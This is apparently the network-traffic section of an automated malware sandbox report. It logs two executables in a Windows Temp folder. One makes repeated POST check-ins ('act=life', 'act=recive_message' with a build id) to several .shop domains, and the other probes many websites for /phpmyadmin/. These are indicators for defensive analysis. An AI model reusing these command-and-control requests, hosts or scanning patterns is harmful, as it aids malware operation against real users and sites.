                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=581qhk2t2oajiemesh6pv0eev2; expires=Fri, 31-May-2024 04:59:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xqpdu05F%2BE44Cb%2FUPls612EYX1otO9ZCvhFxct9UuoKc8vHM2YqsWLTpY9d5LuBgAXSfEw5xV0A0HQpyq%2FR2x0P9L7xqgB5rlTH8rTGfG9FnEf77XhIdR8P93two2%2Ba42htAnFOVg7kqLvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7dc885a673b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:12:25 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-02-05 11:12:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49708 | 172.67.152.52 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:27 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: gemcreedarticulateod.shop
2024-02-05 11:12:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-02-05 11:12:28 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=af96kv0ofl8hpn9l2al04brhk9; expires=Fri, 31-May-2024 04:59:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=neZFgK2xMq4gA%2BXJp%2BhXHZJd%2BjG4PdoZ2%2BatogoaVJde9Y5gIZGJe8CulMXTLPlW4FOnG8xpAmw1Im1cNrIV7cFnHghaqodEovN2h5wNQbiy1qLxuQ67N4oqUVDJw4tyXXK%2BYVLPpww4jajr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7ec7ff9b121-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:12:28 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-02-05 11:12:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 104.21.16.152 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:28 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: secretionsuitcasenioise.shop
2024-02-05 11:12:28 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-02-05 11:12:29 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=bscsv2mivh6og3v3caiiq67gah; expires=Fri, 31-May-2024 04:59:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hCtGrXQETlpypyaOxrpSiZPMl6gBkDVGncRcoBo%2B61Pyov1WEjHPFVG5GkyER7TNSCpMNHDJk%2B2XbvhjaHuU0Zi6Ou3yCLRoI%2FvBWaToEf8qTXKHowyllC6uSCPT1OtsBRhOOLgKY2uBD3Et9RnO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7f3ee1e53b2-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:12:29 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-02-05 11:12:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49713 | 172.67.199.120 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:30 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: claimconcessionrebe.shop
2024-02-05 11:12:30 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-02-05 11:12:30 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=an6jf4or1d105tvuh284j6laru; expires=Fri, 31-May-2024 04:59:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OQvoH9tgHQ3el8gqBsygpzfucL19W1zUABaX%2FX3MBO%2BDsyjE7DZOZ0iAqA%2BD8rDcI7v7f8hXwXol2c9jnFkpJdtl7JnOspDXs7IfmdJwFmwRRfV5En%2Br5%2F7ZxEkBza%2Bi%2FOUKNYtXs7v2EdY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7fcc96c1361-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:12:30 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-02-05 11:12:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49715 | 104.21.83.220 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:31 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: liabilityarrangemenyit.shop
2024-02-05 11:12:31 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-02-05 11:12:31 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzFNUJnYvkAhmxKNiq9sPzxiOsUUm6wQ9sWyPR%2Bb1OEBDq6BffwmLvUsDO6bTW5cR%2BJZRBr7E4oRVRoMkm59mZZGVPiJvBD%2FrbxmHju31psyz%2BlDjVWeUR0FrrF0vPXWc%2BJW52ZAHDfLm4fYLLw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab80428526736-ATL
2024-02-05 11:12:31 UTC | 802 | IN | Data Ascii: 1123<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-02-05 11:12:31 UTC | 1369 | IN | Data Ascii: /cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getE
2024-02-05 11:12:31 UTC | 1369 | IN | Data Ascii: type="text/plain"> <input type="hidden" name="atok" value="9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-bt
2024-02-05 11:12:31 UTC | 855 | IN | Data Ascii: ator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfl
2024-02-05 11:12:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49718 | 104.21.83.220 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:31 UTC | 358 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 61
Host: liabilityarrangemenyit.shop
2024-02-05 11:12:31 UTC | 61 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
2024-02-05 11:12:32 UTC | 818 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:12:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g6egku89f5ft0250ic5vtkjt5q; expires=Fri, 31-May-2024 04:59:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SlDVajWg66c%2FqR2OHCqazmZ5eeVJlJpfYs9RWhuV6ali6SXQe1CO6uIGQ4PFNzrPEfn%2Fcgf2EpapwTHPl6FZmBJgjJ6lj%2Ff8FOJcjy%2BjittPzsqY0lNoWQyPZeICoeLC8v6TTojYib%2BvR4Z32CU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850ab807ca3db10b-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:12:32 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-02-05 11:12:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 51437 | 96.7.224.178 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:49 UTC | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:49 UTC | 435 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 274
Expires: Mon, 05 Feb 2024 11:14:49 GMT
Date: Mon, 05 Feb 2024 11:14:49 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload
Server-Timing: ak_p; desc="1707131689623_1611129006_213759291_16_9738_101_131_-";dur=1
2024-02-05 11:14:49 UTC | 274 | IN | Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;phpmyadmin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131689&#46;cbdb5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 51408 | 172.66.43.64 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:49 UTC | 184 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: nuevopacto.runacode.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:49 UTC | 659 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4514
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VC%2FCmjkta3%2FR%2BVtG8JGdrb%2F7C3IbRBhADPvrpEmV2noPvQOVP%2Fb3lzKhA87FHBG%2Fb6uEoQGS51jpwGhWzqRoL0G6wIKV1N39LPuLmyBe07PF%2F2PDfOGztGECds8qsyd78HJ1ZSxTUdlx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb66191453fe-ATL
2024-02-05 11:14:49 UTC | 710 | IN | Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
2024-02-05 11:14:49 UTC | 1369 | IN | Data Ascii: rrors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.add
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f 6e 6c 69 6e 65 20 61 74 74 61 63 6b 73 2e 20 54 68 65 20 61 63 74 69 6f 6e 20 79 6f 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1066INData Raw: 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">81.181.57.74</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
8           192.168.2.6  51433        104.26.8.17     443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:49 UTC  168  OUT  GET /phpmyadmin/ HTTP/1.1
Host: rage.mp
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:49 UTC  1349  IN  HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12534
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4pInUVDMPwjd%2B201XYHDzYYi8Tdks5fV9N%2FYQ3W3PDnzE5gG8o0NgacAJzguzU1uFkEX%2BhbjNaSM%2FrcWmNbHwwX%2BswVPV5CbMqbqLdWGp6wHkqilKNTfBC8%3D"}],"group":"cf-nel","max_age":604800}
2024-02-05 11:14:49 UTC  182  IN  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 850abb65fff26740-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:49 UTC  1207  IN  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
2024-02-05 11:14:49 UTC  1369  IN  Data Ascii: rk-mode;}&.light{@include light-mode;}}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3;&:hover{text-decoration:underline;color:#ee730a}}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon
2024-02-05 11:14:49 UTC  1369  IN  Data Ascii: ground-color:#003681;color:#fff}}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.clearfix{&:after{display:table;clear:both;content:""}.
2024-02-05 11:14:49 UTC  1369  IN  Data Ascii: -ms-high-contrast: none){body,.main-wrapper{display:block}}</style><meta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 51369 | 104.21.5.25 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:49 UTC | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: opsu.terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 660 | IN | HTTP/1.1 307 Temporary Redirect
Date: Mon, 05 Feb 2024 11:14:49 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Location: https://terna.net
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OZS7uHuZpCeL0HcXXRsmAKLx0pdRNmzPDiNoEFvx19uGweL4l5NkGPMxS5r14WmAtfFfyhKJzhyX0nFkr1qmCZ1jV6oy4Wi9q7FAUzo09sefrZ%2FHP18jemDhKlqt5P25mA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb66298b1d64-ATL
2024-02-05 11:14:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 51416 | 104.17.62.50 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:49 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: accounts.faceit.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:50 UTC | 978 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
last-modified: Mon, 05 Feb 2024 10:47:27 GMT
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
content-security-policy: frame-ancestors 'self' https://*.faceit.com:* https://*.faceit-stage.com:* https://*.faceit-dev.com:* https://*.faceit-sandbox.com:*
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=c3SozpZDJw.b3DlBMcN7Hkn5MPCoHOPNIwpmcQzQ48A-1707131690-1-AdwWkgP73bwM2uLGAPp4na1Jq8SGvEUiGb6Sq8WuE515/RkpxI+avNLNXOyIDHdqB2kMhZ0hqhbTdl9+hRS6DPmY677d60obNbyARbSPvrSM; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.faceit.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=efJjpgaDxK1L9LuAiydeq04prWQsUEOdouYycIVU3L8-1707131690009-0-604800000; path=/; domain=.faceit.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 850abb663cd2452d-ATL
2024-02-05 11:14:50 UTC | 391 | IN | Data Ascii: 8a9<!doctype html><html lang="en"><head><script defer="defer" src="https://cdn-frontend.faceit-cdn.net/faceit-connect/static/js/runtime~main.78a5302e.min.js"></script><script defer="defer" src="https://cdn-frontend.faceit-cdn.net/faceit-connect/static/j
